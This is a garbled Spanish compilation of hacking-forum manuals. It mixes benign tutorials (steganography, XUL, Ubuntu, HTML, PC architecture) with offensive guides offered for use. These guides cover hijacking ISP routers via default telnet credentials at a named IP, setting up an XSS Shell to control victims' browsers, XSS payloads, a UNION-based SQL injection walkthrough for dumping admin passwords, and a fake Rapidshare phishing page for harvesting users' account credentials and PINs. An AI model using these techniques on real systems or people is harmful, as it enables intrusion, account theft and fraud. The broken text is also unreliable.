Documente Academic
Documente Profesional
Documente Cultură
Esteganografa
* Manual Esteganograf
* Manual xul
* Instalar UbuntuStudio
* Telnet y ssh
* XSS TUNELING
* Introduccin a XSS
Introducci
* Arquitectura de Computadores
Criptograf
Criptografa.- el arte de ocultar. La palabra tiene su origen en el griego. kryptos
(oculto, escondido) y graphein (escribir). Y su definicin es: Arte de escribir
con clave secreta o de un modo enigmtico
Este sistema surgi en marzo de 1998, propuesto por Ronald L. Rivest uno de
los creadores de RSA, como desafi a la poltica restrictiva del Gobierno de los
EE.UU. con respecto a la Criptografa. No deja de ser en cierto modo una
curiosidad, debido a lo enormemente grandes que son los mensajes en
comparacin con la cantidad de texto til que se puede incluir en ellos.
Ahora lo que har es introducir un mensaje dentro de una imagen de esa forma
todos vern la imagen y no sospecharan de la informacin adicional que hay,
para ello necesitare tener 3 archivos que los tendremos dentro una misma
carpeta:
Lo que estamos haciendo es copiar de forma binaria (copy /b) nuestro mensaje
a la imagen
Ahora ejecutamos nuestro editor hexadecimal en mi caso utilizare Hex
Workshop y abrimos nuestra imagen y buscamos el contenido de nuestro
separador AB--//ba
Una vez encontrado nuestro texto separador vemos nuestro mensaje secreto
que en este caso es este es un ejemplo de esteganografia.
En este ejemplo introduje nuestro mensaje al final de los datos de la imagen
pero aun as este mensaje es muy fcil de interceptar lo ideal hubiese sido
haber introducido fragmentos de nuestro mensaje con nuestro separador y
haber introducido mas informacin (spam) haciendo uso de la tcnica chaffing
and winnowing antes mencionada pero siempre se debe de empezar con
ejemplos bsicos y simples para despus seguir con los mas complejos
Tambin se pudo usar la criptografa para hacer ilegible nuestro mensaje eso ya
es a cuenta de la imaginacin y el grado de seguridad que le quieran dar.
Propiedad de www.level-23.com
Autor : Shevchenko
Manual Xul
Hola a todos soy Shevchenko y pertenezco a la comunidad level-23 este es mi
primer manual sobre XUL y tambin la primera entrega comenzare
respondindoles Qu es XUL?
<?xml version="1.0"?>
<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
<window
id="ventana"
title="Ejemplo XUL"
orient="horizontal"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
...
</window>
1. <?xml version="1.0"?>
Esta lnea declara simplemente que se trata de un archivo XML.
Esta lnea se utiliza para especificar las hojas de estilo que va a utilizar para el
archivo. Puede incorporar mas lneas haciendo referencia a su hoja de estilo
3. <window
4. id="ventana"
5. title="Ejemplo XUL"
6. orient="horizontal"
7.xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
Esta lnea declara el nombre para XUL, lo que se debera poner en la ventana de
elemento que indique que todos sus hijos son XUL. Mozilla va a reconocer esta
URL internamente.
8. ...
9. </window>
Y, por ltimo, tenemos que cerrar la ventana etiqueta al final del archivo.
Aadiendo un bot
botn Etiqueta <button>
<button
="boton"
id="boton"
id
="dialog"
class="dialog"
class
="OK"
label="OK"
label
="image.jpg"
image="image.jpg"
image
="true"
disabled="true"
disabled
="t"
accesskey="t"
accesskey />
="t"/>
Los atributos son los siguientes, todos los cuales son opcionales:
Id: Un identificador nico para el botn. Ver este atributo en todos los
elementos.
Class: Identificador de clase para el botn. Esto funciona igual que en HTML y lo
podemos utilizar para cambiarle atributos con hojas de estilo (CSS).
Disabled: Solo existen dos estados (True y False), trae el botn esta
habilitado y false desactivado o deshabilitado
Aadiendo im
imgenes Etiqueta <Image>
Al igual que HTML, XUL tiene un elemento para mostrar imgenes dentro de una
ventana. Puede utilizar el atributo src para especificar la URL del archivo de
imagen. El ejemplo siguiente muestra esto:
<image src="banner.jpg"/>
Su funcionamiento es igual que <img> en HTML
HTML tiene un elemento de entrada que pueden ser utilizados para los controles
de entrada de texto. XUL tiene un elemento similar, de texto, utilizadas para el
mismo proposito. Sin ningn atributo, el elemento de texto crea un cuadro en el
que el usuario puede introducir texto. Esta etiqueta tambien posee los mismos
atributos como los controles de entrada HTML. Las siguientes son algunas de
ellas:
<box>
<vbox>
<hbox>
<label value="Ingrese Texto" flex="1"/>
<textbox id="texto-ingresado"/>
</hbox>
<hbox>
<label value="Ingrese Password" flex="1"/>
<textbox id="pass-ingresado" type="password" maxlength="8"/>
</hbox>
</vbox>
</box>
Desde ahora dejo un poco el discurso y empezamos ms con los ejemplos que
es la mejor forma de aprender
<textbox multiline="true"
value="En esta caja de texto se podra escribir varias lineas."/>
XUL proporciona dos tipos de elementos para crear listas, una lista para crear
mltiples hileras, y un elemento menulist para crear la lista desplegable cajas.
Ellos funcionan de manera similar al HTML, pero los elementos XUL tienen
caractersticas adicionales.
Por ejemplo, este cuadro de lista tendr cuatro filas, una para cada tema.
<listbox>
<listitem label="Opera"/>
<listitem label="Firefox"/>
<listitem label="Chrome"/>
<listitem label="IE"/>
</listbox>
Multi-Column List Boxes
La lista tambin soporta mltiples columnas. Cada celda puede tener contenido
dentro de ella.
El listcell elemento puede ser utilizado para cada celda en una fila. Si desea
tener tres columnas, usted tendr que agregar tres elementos listcell dentro de
cada ListItem. Para especificar el contenido de texto de una celda, coloque una
etiqueta en un atributo listcell. Por el simple caso de que slo hay una columna,
tambin puede colocar la etiqueta de atributos directamente en el elemento
ListItem y dejar el listcell a cabo por completo, como se vio en la anterior lista de
ejemplos.
<listbox>
<listcols>
<listcol/>
<listcol/>
</listcols>
<listitem>
<listcell label="Rosario"/>
<listcell label="22 aos"/>
</listitem>
<listitem>
<listcell label="Jennifer"/>
<listcell label="23 aos"/>
</listitem>
<listitem>
<listcell label="Alejandra"/>
<listcell label="21 aos"/>
</listitem>
</listbox>
Header Rows
Tambin permiten una lnea de encabezamiento. Esto es mucho como una lnea
regular, salvo que se muestra diferente. Usted podra utilizar esto para crear
cabeceras de columna. Dos nuevos elementos que se utilizan.
<listbox>
<listhead>
<listheader label="Nombre"/>
<listheader label="Ocupacin"/>
</listhead>
<listcols>
<listcol/>
<listcol flex="1"/>
</listcols>
<listitem>
<listcell label="Rosario"/>
<listcell label="Mi novia"/>
</listitem>
<listitem>
<listcell label="Jennifer"/>
<listcell label="Estudiante"/>
</listitem>
<listitem>
<listcell label="Alejandra"/>
<listcell label="Sistemas"/>
</listitem>
</listbox>
Comenzamos ahora con la practica realizando una calculadora, pero xul solo
sirve para hacer el interface (pantallazo) por eso usaremos javascript para
realizar las operaciones.
Calculadora.xul
<window id="calculadora"
title="Calculadora"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="funcion.js"/>
Forma corta
<etiqueta />
Forma larga
<etiqueta> <etiqueta/>
Xul tambin permite utilizar las hojas de estilo (CSS) y para usarlas debemos de
incorporar la siguiente lnea de cdigo donde href ira la ruta de nuestra hoja de
estilo
Como dije antes xul solo es la pantalla que visualizamos y si queremos realizar
algn proyecto debemos de utilizar javascript
<script src="funcion.js"/>
En xul tambin existen los contenedores con lo que podemos ordenar los
botones de manera horizontal (hbox) y vertical (vbox)
Para usar una funcin de javascript en xul haremos uso de la etiqueta button y
de sus eventos: oncommand, onclick, etc.
document.getElementById('Id-xul').value
Les voy a dejar todo el ejemplo para que lo puedan descargar y probar
P.D.: No se por que siempre que alguien te ensea un nuevo lenguaje siempre
acabas realizando una calculadora XD
Propiedad de www.level-23.com
Autor : Shevchenko
Intrusin a un router mediante telnet
Intrusi
ndice
1. Introducci
Introduccin
2. Lo que necesitaremos
teora
3. Un poco de teor
1. INTRODUCCIN
INTRODUCCI
telef
Hace ya unos aos en la compaa telef nica
telef nica tuvieron la brillante idea de dejar el
puerto 23 abierto en los routers que regalaban cuando contratabas sus servicios de
Internet para as si les surga algn problema con la configuracin de ese router no
tener que desplazarse para repararlo y poder hacerlo conectndose al router mediante
telnet, teniendo en cuenta esto y que muchos de los usuarios de esos routers bien por
desconocimiento o por simple dejadez no cambian el usuario y contrasea que el
router trae por defecto, con esto nos encontramos que lo mismo que los de telef telef
telefnica
nica
pueden entrar a esos routers nosotros tambin ; )
2. LO QUE NECESITAMOS
Necesitaremos saber las ips vulnerables, que tipo de router utilizan y el usuario y la
contrasea para poder conseguir entrar en ellos.
3. UN POCO DE TEORIA
Bueno, vamos a intentar mapear un puerto dentro de este router para redirigirlo a un
servidor de IRC y as ocultar nuestra ip conectndonos atravs de el.
Primero abrimos una conexin de Telnet en la consola con la ip, en este caso con
80.32.109.73 y nos logueamos (todo esto como vimos en el punto 3) una vez hecho esto
intentaremos redirigirle el puerto 5555 en direccin al servidor de IRC para ello
utilizaremos los siguientes comandos. (Lo resaltado en gris son los comandos a
introducir)
enable ip wan_to_wan_forwarding
add nat tcp vc internet public_port 5555 private_port 6667 private_address 149.9.1.16
Una vez introducido el comando anterior nos pedir que salvemos los cambios,
tecleamos lo siguiente:
save all
reboot
Yes
Bueno pues ya tenemos todo hecho nos hemos fabricado un Proxy para conectarnos al
IRC con una ip distinta a la nuestra y as poder permanecer en el anonimato, muestro
una captura:
En la imagen vemos como el nick de arriba aparece con mi ip real, en cambio el nick de
abajo tambin soy yo pero conectndome atravs del router al que terminamos de
mapear el puerto, y os preguntareis tanto trabajo
Autor : Stop
Instalar UbuntuStudio
En este manual les mostraremos como instalar UbuntuStudio en Ubuntu desde
los repositorios sin afectar a Windows.
AMD Athlon 1000+ 512 Gbyte de memoria RAM Tarjeta de vdeo nVidia
GeForce2 400 MX AGP con 64 MBytes Monitor TFT de 17 HP pavilion vs17 Placa
base Gygabyte GA-7IXEH con chipset VIA KT133 Discos duros: 1 de 40 GBytes
Seagate ATA, 1 de 13 GBytes Seagate ATA Regrabadora CD Plextor Tarjeta de
Sonido: Creative Soundblaster Live! PCI Teclado Logitech Cordless Keyboard
Adaptador Wifi ZyDAS 802.11 b/g USB (proporcionado por Jazztel)
AMD Athlon 64 3000+ 1 Gbyte de memoria RAM Tarjeta de vdeo nVidia GeForce
7600 GS (G70) PCI-Express con 512 MBytes Monitor TFT de 17 HP pavilion
f1723 Placa base Gygabyte GA-K8N Ultra-9 con chipset nVidia nForce4 Discos
duros: 1 de 120 GBytes Seagate SATA, 1 de 250 GBytes Seagate SATA
Regrabadora DVD Nec Tarjeta de Sonido: Creative Soundblaster 128 PCI
Webcam USB Logitech QuickCam Connect Teclado Logitech Cordless
Keyboard S510 Impresora HP 930C USB
Para los que no sepan ingles les voy a traducir las 3 opciones que se muestran
para que as puedan tener una idea.
Instala y desinstala Ubuntu como si fuera otra aplicacin, sin necesidad de una
particin dedicada. al arrancar el equipo, podr iniciar Windows o Ubuntu,En
este modo, la hibernacin no est habilitada y el rendimiento del disco se
reduce ligeramente.
Ahora que ya sabemos lo que son las tres opciones le vamos a dar a install
inside windows luego que le demos a la opcin pasaremos a la siguiente
ventana:
Tamao de la instalaci
Tama n: Bueno ah escogeremos la cantidad de espacio que
instalaci
queremos que tenga nuestro Ubuntu lo mnimo son 4 pero escojan mas as
tendrn mas espacios para instalar las aplicaciones que quieran.
Usuario: Por defecto nos vendr el mismo usuario que tienes en Windows, pero
tranquilo puedes cambiarlo. El usuario es el nombre con el que iniciaras sesin
en Ubuntu.
Luego que haigamos terminado de llenar los datos le damos a instalar. Luego
nos saldr la prxima ventana.
An el sistema no se est instalando. Lo que est haciendo es preparar unos
archivos temporales de instalacin para la segunda fase, que ser la que s
haga la instalacin como tal.
luego que la computadora reinicie nos saldr una ventana como esta:
Nos da 2 opciones para escoges sale Windows y Ubuntu en este caso
escogemos Ubuntu.
Ahora nos mostrar otro men de seleccin, en esta ocasin vamos a escojer
menu.lst. Elegimos la primera opcin que vemos en la imagen y le damos
ENTER.
luego aqu bien la parte opcional ya que todo depende de nuestras necesidades
instalando el tipo de paquetes que necesitemos ya sea para produccin de
audio, vdeo o de imgenes.
Autor: UnknownShadow
Telnet y ssh
Telnet es el gnesis cuanto a conexiones se refriere, en la antigedad cuando
no haba exploradores funcionales como FireFox, Opera etc, o no tan
funcionales como IE, los habitantes del Cyber-mundo tenan que conformarse
con una simple consola y un protocolo antiguo pero poderoso para conectarse a
la telaraa mundial llamado Telnet
El Tel
Telecommunication Net
Network (Telnet) es un protocolo de red que sirve para
acceder a otra maquina (servidor) para hacer uso remoto de esta. Es decir para
hacer manejo de la maquina como si nosotros estuviramos delante de ella.
Esto nos da el potencial de poder usar los recursos de esta maquina
(procesador o RAM ) sin levantarnos de la silla en el stano de nuestra madre
Ejemplo:
locis.loc.gov 23
2009.85.171.100 23
Casi todos los sistemas operativos tiene un cliente Telnet nativo /* Digo casi
todos por que me acabo de dar cuenta que Windows Vista no contiene el fichero
telnet.exe en System32, increible pero cierto, antenselo para recordar las
Micropend%#@$ de Win. Vista */
Connected to ejemplo.gov
Escape character is '^]'.
Hasta ahora todo bonito, podemos conectarnos a servidores con unos cuantos
comandos y disfrutar de la consola todo sin salir de casa, pero entonces Cul
es el problema?, y la respuesta que siempre escuchamos: La seguridad.
Telnet abri las pertas a toda una gama de posibilidades desde usuarios que
solo pretendan conectarse a la biblioteca del congreso hasta algunos mal
vivientes que descubrieron la cantidad de datos importantes que viajaban en la
red sin ningn tipo de proteccin.
Ese era un gran problema ya que aunque guardaras muy bien tu contrasea de
40 caracteres, despus que esa informacin sala de tu ordenador, cualquier
persona que se encontrara sniffeando el trfico de tu red poda leer en texto
plano toda tu actividad.
Fue entonces cuando en 1995 Tatu Ylnen propuso la primera versin del
protocolo ahora conocido como SSH.
Secure Sh ell
Shell
SSH (Secure Shell) trabaja de forma similar a como se hace con Telnet. La
diferencia principal es que SSH usa tcnicas de cifrado que hacen que la
informacin que viaja por el medio de comunicacin vaya de manera no legible y
ninguna tercera persona pueda descubrir el usuario y contrasea de la
conexin ni lo que se escribe durante toda la sesin.
Esto represento una gran defensa (aunque no detuvo) a ataques del tipo MITM
(Man in the Middle), ARP spoofing, etc., haciendo que el problema de la
seguridad ahora dependiera de algoritmos matemticos de encriptacin
abriendo ahora nuevos problemas para el atacante en turno.
Y el Open SSH
http://www.openssh.com/
Primero dejamos nuestro sniffer escuchando todos los paquetes TCP nuestra
propia red. Y nos loggearemos a una cuenta de Messenger usando un servicio
en lnea como ebbudy o la que gusten y analizaremos el trafico.
Como vern esta mi mail tan claro como el agua (el cual es falso jiji) y un lindo
hash con la contrasea, que por lo menos ahora viajan en hash, en el primer
Messenger que saco Yahoo no hacia ni eso
TCP Header:
Source Port . . . . . . . 80
Dest Port . . . . . . . . -13376
Acknowledgement Number . 1142514760
Sequence Number . . . . . 570272387
Urgent Pointer . . . . . 0
Flags
ACK
PSH
Windows . . . . . . . . . 15
Checksum . . . . . . . . 39849
Data:
$^ 9o/*x{ &## hs N | Zf#]VS'( t {$8%Se^
2A1cX \? jUhv HID g'
Observando uno de los paquetes nos damos cuenta que el campo data no es
comprensible ya que esta encriptado, lo cual pone mas difcil las cosas,
dependiendo del cliente/servidor la comunicacin estar encriptada en RSA de
64,128, 256 o hasta 1024bits.
Ms informacin en:
http://www.openssh.com/
http://www.balug.org.ar/ssh.html
Que es el tunneling?
El L2TP puede ser usado como un protocolo de Tnel tanto para VPNs de unin
de delegaciones (redes de delegaciones) como para el acceso de usuarios
remotos, de hecho, el L2TP puede usarse entre :
El cliente y el router
Entre el NAS y el router
Entre un router y otro
Para ms informacin
http://rapidshare.com/files/179568239/XSS_by_Max_p0wer.doc
XSS TUNNELING
Qu es un canal XSS?
Qu
Qu es la xss Shell?
Qu
XSS Shell es una herramienta que puede ser usado para configurar un canal
XSS entre una vctima
y un atacante para que un atacante pueda controlar el navegador de la vctima
mediante el envo de
comandos. Esta comunicacin es bidireccional.
Para obtener el XSS Shell a trabajar a un atacante tiene que inyectar el XSS
Shell de JavaScript
de referencia por medio de un ataque XSS. El atacante es capaz de controlar la
vctima
navegador. Despus de este punto, el atacante puede ver las peticiones, las
respuestas y es capaz de
encargar el navegador de la vctima para llevar adelante las peticiones etc.
En primer lugar, el lado del servidor es parte de la Shell coordina el XSS XSS
Shell entre un
agresor y la vctima. Es una aplicacin del lado del servidor y requiere un ASP y
IIS
servidor Web. Utiliza una base de datos de MS Access como de almacenamiento.
1. Un atacante infecta una pgina Web con una persistente o reflejado (temporal)
de XSS
pide que ataque XSS Shell remoto JavaScript.
2. La vctima sigue un enlace o visiten la pgina y ejecuta el cdigo JavaScript
en
ese dominio.
3. El navegador de la vctima comienza a realizar peticiones al peridico XSS
Shell
Servidor y busca nuevos comandos.
4. Cuando la vctima recibe un nuevo navegador como comando (Obtener
cookies,
Ejecutar JavaScript personalizado, Obtener clave de registro de datos etc.), es
procesada y
devuelve los resultados a la XSS Shell.
5. El atacante puede llevar a nuevos comandos vctima (s) de navegador y ver
los
resultados XSS Shell de la interfaz de administracin.
Qu es XSS tneles?
Qu
XSS de tneles es el tnel de trfico HTTP a travs de un canal a usar XSS
prcticamente cualquier aplicacin que admita proxies HTTP.
Qu es XSS tnel?
XSS tnel es el Proxy HTTP estndar que se sienta en un sistema del atacante.
Cualquier herramienta
que est configurado para utilizar el tnel que su trfico a travs del canal
activo en XSS
el XSS Shell servidor. XSS convierte el tnel de la solicitud y responde
transparente para validar las respuestas de HTTP y XSS Shell solicitudes.
XSS tnel est escrito en. NET y requiere. NET Framework para trabajar. Se
trata de una licencia GPL
Solicitud de licencia de cdigo abierto.
Este proceso requiere entre dominios leer. XSS Shell utiliza el mando a distancia
JavaScript para eludir la carga del mismo origen, la poltica de restricciones.
O Si hay nuevos comandos, que las cargas y los procesos y enva el
las respuestas (puede ser simplemente un cdigo de confirmacin o el cdigo
fuente de un
pgina o un archivo binario) para XSS Shell servidor.
Por defecto, el tnel de XSS cachs JavaScript, CSS y archivos de imagen para
una mejor
rendimiento. Esto es realmente necesario si se utiliza el XSS tnel con un
navegador. Si
pidi a los recursos ya est en la cach XSS tnel y se puede
obtenidos de la memoria cach local y enviado a la aplicacin cliente.
Necesitamos:
Una vez extrados el rar tenemos las carpetas con la Shell y el tunnel
Procederemos a configurar nuestra Shell
<%
Response.Write Server.MapPath(".")
%>
E:\user1\level23\db\shell.mdb
Una vez tenemos todo configurado subimos todos los archivos y carpetas de
nuestra shell
http://free.7host05.com/level23/admin/Default.asp
la contrasea por defecto es w00t pero puede ser cambiada en el archivo
db.asp
configuracin lan
frozenfew
Autor : Max p0wer frozenfew
Introduccin a XSS
Introducci
XSS es un ataque basado en la explotacion de vulnerabilidades del sistema de
validacion de HTML incrustado. Su nombre, del ingles Cross Site Scripting, y
renombrado XSS para que no sea confundido con las hojas de estilo en cascada
(CSS), originalmente abarcaba cualquier
ataque que permitiera ejecutar codigo de scripting, como VBScript o
javascript, en el contexto de otro dominio. Recientemente se acostumbra a
llamar a los ataques de XSS HTML Injection, sin embargo el termino correcto
es XSS. Estos errores se pueden encontrar en cualquier aplicacion HTML, no se
limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS,
o incluso el navegador en si-. El problema esta en que normalmente no se
validan correctamente los datos de entrada que son usados en cierta aplicacion.
Esta vulnerabilidad puede estar presente de forma directa (foros, mensajes de
error, comentarios) o indirecta (redirecciones, framesets). Cada una se trata de
forma diferente.
Indirecta
Sucede cuando hay un mensaje o una ruta en la URL del navegador o en una
cookie. Para saber el contenido de una cookie, sin usar ningun tipo de iecv o
addin para tu navegador, puedes usar el siguiente script de jasildbg. Solo
coloca TODO lo que esta en color negro en la barra de direcciones, y presiona
Enter.
javascript:for(var g in document.cookie.split
(';'))void(prompt("Valor de cookie "+document.cookie.split
(';')[g].split
(=')[0],document.cookie.split(;')[g].split(=')[1]));alert
(Cookies:\n+document.cookie.replace(/;/,\r\n));
Que podemos ver con este ejemplo? Que podemos meter comandos javascript
solo modificando una URL.
Usando FrameSets
Regresemos al ejemplo del frameset, que segun la pagina que coloques te crea
un frame a esa pagina. Que pasara si pones en esa URL?
javascript:while(1)alert("level-23.org!");
Hasta ahi- llegan los newbies. Pero vamos a ponernos en la piel de un experto.
Se trata de colocar un script que tome tu cookie, y mande un mp al
administrador, o incluso, que borre todos los mensajes de un foro.
Otro uso comun para estas vulnerabilidades es lograr hacer phishing; o colocar
un exploit.
Quiere ello decir que tu ves la barra de direcciones, y ves que estas en una
pagina, pero realmente estas en otra. Introduces tu contrasea y la fastidiaste.
Lo peor son los sitios de descarga, que colocan en la misma URL el sitio de
objetivo. Esas paginas web son vulnerables a ataques XSS indirectos. O sea que
un intruso puede colocar una imagen con enlace al sitio malicioso, y se ejecuta,
sin que el usuario lo sepa.
Mensaje personalizado
error.php?error=Usuario%20Invalido
Un <script> que cree otra sesion bajo otro usuario y tu sesion actual la mande al
atacante (lo explicado de cURL mas arriba), puede causar estragos.
<script> document.documentElement.innerHTML="NADA";</script>
Directa
Funciona localizando puntos debiles en la programacion de los filtros. Asi que si,
por ejemplo, logran quitar los <iframe>, <script>, el atacante siempre puede
poner un <div> malicioso, o incluso un <u> o <s>. Tags que casi siempre estan
permitidos.
Ejemplos de Scripts donde no son comunes de encontrar
<BR SIZE="&{alert('level-23')}">
<div fu="alert('anti-emo');"
STYLE="background-image: url(javascript:eval(this.fu))">
Ajax
// para firefox,
xmlhttp.open("TRACE","./",false);xmlhttp.send(null);
str1=xmlhttp.responseText;
str2=splitString[1];
str3=str2.match(/.*/)[0];
alert(str3);
<?php$archivo = fopen('log2.htm','a');
$re = $HTTPREFERRER;
fwrite($archivo, '<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
frozenfew
Autor : Max p0wer frozenfew
Curso Bsico de Programaci
Programacin en
HTML y CSS
CONTENIDO
Encabezados
Prrafos en HTML
Saltos de lnea
Lneas Horizontales
Atributo ALT
Etiqueta <Font>
Listas en HTML
Comentarios en HTML
Formularios en HTML
Cajas de texto
Botones
Cajas de seleccin
Introduccin a CSS
Que es CSS
Comentarios en CSS
Para crear un sitio web en HTML necesitamos de un editor podemos decir que el editor
ms fcil de conseguir es un editor de texto, en Windows se puede usar el notepad
notepad,
pero para facilitar las tareas podemos usar editores avanzados como lo son:
Adobe Dreamweaver
Composici
Composici n del lenguaje
HTML es un lenguaje como ya hemos dicho que trabaja con etiquetas y atributos la
forma correcta de escribir una etiqueta es:
<html>
<head>
<title> </title>
</head>
<body>
</body>
</html>
Explicacin:
Etiqueta Explicacin
<html> Indica el inicio de
un nuevo
documento html
<head> Indica la cabecera
del documento
<title> All se coloca el
titulo del
documento
<body> Despus de la
etiqueta body va
todo el resto de la
pgina web
imgenes texto etc.
Encabezados
Los encabezados son los ttulos de cada pgina dentro del documento, existen varios
niveles de encabezados:
<h1> Encabezado
<h2> Encabezado
<h3> Encabezado
<h4> Encabezado
<h5> Encabezado
<h6> Encabezado
Prrafos en HTML
Bueno existen varias formas de crear espacios entre nuestros textos pero la forma
correcta de hacerlo es separar todo con prrafos, para ellos utilizamos la etiqueta <p>
Y si hacen la prueba vern que entre etiqueta hay espacios que separan los prrafos.
Saltos de lnea
Muchas veces queremos separar alguna oracin o alguna lnea de texto o algn objeto
que se encuentre en nuestra pgina para eso usamos los saltos de lnea y la siguiente
etiqueta al final de cada texto:
<br>
Lineas horizontales
Bueno una lnea horizontal como ya su nombre lo indica es una llinea que separa la
pgina para insertarla debes usar esta etiqueta:
<hr>
Para insertar una imagen esta debe estar en la misma carpeta para usarlo de esta
forma o escribir la ruta:
src=ruta.gif
<img src= ruta.gif></img>
Atributo ALT
Bueno la etiqueta <a> sirve para referirse a un link o una url, pero no funciona sola,
debe tener ciertos atributos, por ejemplo:
Y para hacer un link que vaya directamente a ese lugar del documento sencillamente:
Autor : Ghost
Manual Inyeccion Sql
Hola, soy eDeex_. Creo que ya muchos me conocen, y hoy os voy a explicar
sobre Deface, en concreto SQL injecction, y he decidido SQL injecction, por qu
es lo mas fcil de aprender, y por que la mayora de las vulnerabilidades son
SQL.
Qu es Deface?
Qu es SQL Inyeccin?
Qu es un Dork?
allinurl: .php?id=
Sin las comillas. Ese Dork es el ms bsico pero hay muchsimos ms, todo es
con tal de ir mirando.
No todos son as, pero tienen algo parecido. Bueno ya sabemos que es
vulnerable ara toca poner inyeccin. Lo principal es;
-1+union+all+select+0,1
Quedara as ;
www.web.com/noticias.php?id=-1+union+all+select+0,1
Ara toca ir buscando, hasta que se te quite los errores, y te salgan nmeros.
Para ir buscando tienes que ir aadiendo nmeros , ejemplo:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,4,5,6,7--
Siempre al final de cada numero pon -- [Dos guiones] sin las comillas.
+from+information_schema.tables
+1,1--
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
1,1--
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
2,1--
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
3,1--
A si hasta que te salga algo importante. Nunca suele pasar de 100 pero bueno,
nunca se sabe.
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from
y pones +admin , pones admin por que es la tabla importante que te ha tirado,
quedara as:
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+admin
& ara en table_name hay que ir probando palabras como; Login, admin,
password, clave, pass, user, email, mail , etc... Quedara a si:
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,admin,5,6,7+from+admin
concat(nombre,0x3a3a,pass)
Quedara a si:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,
concat(admin,0x3a3a,clave),5,6,7+from+admin
Y Listo ya tenemos usuario y password. Ahora toca buscar el panel que para m
es lo ms difcil :P
Hasta aqu hemos llegado amigos, mucha suerte y cuidaros, nos vemos por
www.level-23.com
Autor : eDeex_
ARQUITECTURA BSICA DE UN PC
(COMPUTADOR)
Saludos lectores, desde level-23 me place escribirles :P
Ahora pasar a explicar, en un orden para que todo sea comprensible y podis
unir lazos entre conceptos, los anteriores elementos.
1-Memoria:
2- BUS de comunicaciones:
La palabra BUS (lejos de referirse al peor presidente de la historia de los EEUU
jeje), nos puede recordar a el transporte pblico, no estamos mal encaminados,
pues esta es la funcin principal de el BUS, transportar operaciones. Tenemos 3
tipos de buses fundamentales:
3- Dispositivos E/S:
O OP R AN OR XO
P 2 E D R
1 S
0 0 U 0 0 0
0 1 L 0 1 1
1 0 T 0 1 1
0 1 D 1 1 0
O
4- Microprocesador (CPU):
La CPU es la que ejecuta todos los clculos y se encarga de controlar todo lo
ocurrido, es decir, es el componente central del equipo (CPUUnidad Central
de Procesos).
Consta de 3 partes fundamentales: la ALU, las unidades de registros y la unidad
de control.
Aqu doy por terminado el artculo este que os introducir o os aclarar el:
cmo funciona una computadora? y os dar va libre para probar nuevas
cosas :P
Autor : Habor
www.justfree.com
http://www.blackapplehost.com
http://www.000webhost.com/
http://www.megaupload.com/?d=I8JL55JA
Password level-23.com
Bien una vez descargado el paquete subimos todos los archivos al hosting
La primera linea es para guardar los datos de las cuentas con mas de 10000
puntos (pueden cambiar el nombre del archivo .html)
La segunda linea es para guardar los datos de las cuentas con menos de 10000
puntos (pueden cambiar el nombre del archivo .html)
La tercera linea es la pass que nos pedira para entrar en el admin y borrar links
u otras cosas (pueden cambiar el nombre )
http://www.level-23.com/test/admin.php
Vamos a Links Panel y ponemos Create Links le damos a Go! Aqui nos saldra
una ventana para colocar los links originales de rapidshare los pegamos asi
http://urlteam.org
O esta otra
http://lix.in
Para ver los datos capturados vamos al panel de admin y en Passwords Panel
ponemos View Passwords List y le damos Go!
Es para que nos regalen su unlock code si lo ponen saldra asi tambien
Account is Locked
PIN = 123654789
Y ya esta es bien facil,para que esto funcione bien y se piquen los usuarios deben de
crear post reales con el primer link de fake,me refiero a post con explicacion +
imagenes para que parezca de verdad real,ya que si ponen los datos bien se les
redirecciona a la pagina real de rapidshare para poder desxcargar el archivo real asi
no se dan ni cuenta de pasaron por un fake al principo
Autor : Xtazis
Esta claro que primero tienen que tener un hosting para poder alojar los
archivos descargados,este paso lo salto ya que seguro que lo saben
hacer,sirve cualquier hosting si no tiene publicidad mucho mejor ya que si no
nadie picara.
Pass: level-23.com
Bien,ahora nos guiaremos por este link ya creado solo tenemos que modificarlo
a nuestro gusto para que parezca real ;la descargar
http://www.level-
23.com/test/?file_name=NOCHE2.By.MX.part01.rar&file_description=NOCHE2.
By.MX.part01.rar&file_size=93.75%20MB&downloadID=UU4MWIIU
Este ya esta preparado por m'i con los datos que le puse para hacer este
manual,lo primero que tienen que hacer es buscarse una pelicula o algun juego
que sean nuevos,digo esto por que para que la gente que tienen premium pique
la descarga debe de ser de bastantes links si solo ponen uno nadie picara eso
esta claro.Por ejemplo voy a modificar ese mismo link otra vez para que puedan
ver como se hace,primero buscamos una descarga como ya he dicho yo usare
esta
No hace falta que copien todos los links sino quieren solo es para sacarle los
datos y que parezca real...
Estos son los datos reales ahora vamos a crear el link fake con estos mismos
datos pero la url de nuestro hosting,como pueden ver estan las tres lineas
numeradas 1,2,3,copiamos el link al bloc de notas
/?file_name=TBB1988.x264.m-hd-
http://www.level-23.com/test/?file_name=TBB1988.x264.m-hd-
http://www.level-23.com/test/?file_name=
tom.720p.part0..rar &file_description= www.mhd-hdhieu.com
&file_description=www.mhd-hdhieu.com &file_size=
www.mhd-hdhieu.com&file_size= 95.78
&file_size=95.78
%20MB&downloadID=UU4MWIIU
MB%20MB&downloadID=UU4MWIIU
MB
Esa es la pagina fake que vera las victimas,voy a probar a ver si captura los
datos,entran en el Login
Y ahora para pder ver los datos capturados solo ponemos esto en el navegador
http://www.level-23.com/test/grabbed.html
http://www.level-23.com/test/grabbed.html
La rojo es su hosting xD
Ya tenemos los datos del primer inocente xD...ahora para camuflar la url
nuestra y que parezca mas real ya que si ven un url sospechosa como la mia
Nadie descargara y borraran el post en 2 minutos,para camuflar la url podemos
usar esta pagina
http://urlteam.org
O esta otra
http://lix.in/
Link fake
